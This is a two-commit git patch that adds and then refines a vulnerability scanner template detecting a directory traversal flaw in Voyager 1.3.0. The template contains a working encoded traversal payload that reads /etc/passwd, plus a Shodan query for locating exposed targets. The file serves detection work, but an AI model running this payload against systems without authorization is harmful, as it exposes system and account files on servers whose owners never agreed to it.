From 380c0e3911cc73784a131e8fa7c9819df8aeff4a Mon Sep 17 00:00:00 2001
From: memmedrehimzade <36675105+memmedrehimzade@users.noreply.github.com>
Date: Sun, 31 Mar 2024 15:14:49 +0400
Subject: [PATCH 1/2] Create voyager-path-traversal.yaml

---
 .../other/voyager-path-traversal.yaml         | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 http/vulnerabilities/other/voyager-path-traversal.yaml

diff --git a/http/vulnerabilities/other/voyager-path-traversal.yaml b/http/vulnerabilities/other/voyager-path-traversal.yaml
new file mode 100644
index 0000000000..8be474a7d3
--- /dev/null
+++ b/http/vulnerabilities/other/voyager-path-traversal.yaml
@@ -0,0 +1,33 @@
+id: voyager-path-traversal
+
+info:
+  name: voyager_directory_traversal
+  author: mammad_rahimzada
+  severity: high
+  description: voyager 1.3.0 is vulnerable to local file inclusion.
+  reference:
+   https://www.exploit-db.com/exploits/47875
+  classification:
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: voyager , lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body
+        condition: or
+
+      - type: status
+        status:
+          - 200
+

From 869bf27a3745a648df11c7fce2c43a80740d8a2b Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sun, 31 Mar 2024 23:11:43 +0530
Subject: [PATCH 2/2] Update and rename voyager-path-traversal.yaml to
 voyager-lfi.yaml

---
 ...r-path-traversal.yaml => voyager-lfi.yaml} | 28 +++++++++++--------
 1 file changed, 17 insertions(+), 11 deletions(-)
 rename http/vulnerabilities/other/{voyager-path-traversal.yaml => voyager-lfi.yaml} (57%)

diff --git a/http/vulnerabilities/other/voyager-path-traversal.yaml b/http/vulnerabilities/other/voyager-lfi.yaml
similarity index 57%
rename from http/vulnerabilities/other/voyager-path-traversal.yaml
rename to http/vulnerabilities/other/voyager-lfi.yaml
index 8be474a7d3..a5cf9d6ae1 100644
--- a/http/vulnerabilities/other/voyager-path-traversal.yaml
+++ b/http/vulnerabilities/other/voyager-lfi.yaml
@@ -1,33 +1,39 @@
-id: voyager-path-traversal
+id: voyager-lfi
 
 info:
-  name: voyager_directory_traversal
+  name: Voyager 1.3.0 - Directory Traversal
   author: mammad_rahimzada
   severity: high
-  description: voyager 1.3.0 is vulnerable to local file inclusion.
+  description: |
+    Voyager 1.3.0 is vulnerable to local file inclusion.
   reference:
-   https://www.exploit-db.com/exploits/47875
+    - https://www.exploit-db.com/exploits/47875
   classification:
     cvss-score: 7.5
     cwe-id: CWE-22
-  tags: voyager , lfi
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: html:"voyager-assets"
+  tags: voyager,lfi
 
-requests:
+http:
   - method: GET
     path:
       - "{{BaseURL}}/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd"
 
-    stop-at-first-match: true
     matchers-condition: and
     matchers:
-
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
-        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
 
       - type: status
         status:
           - 200
-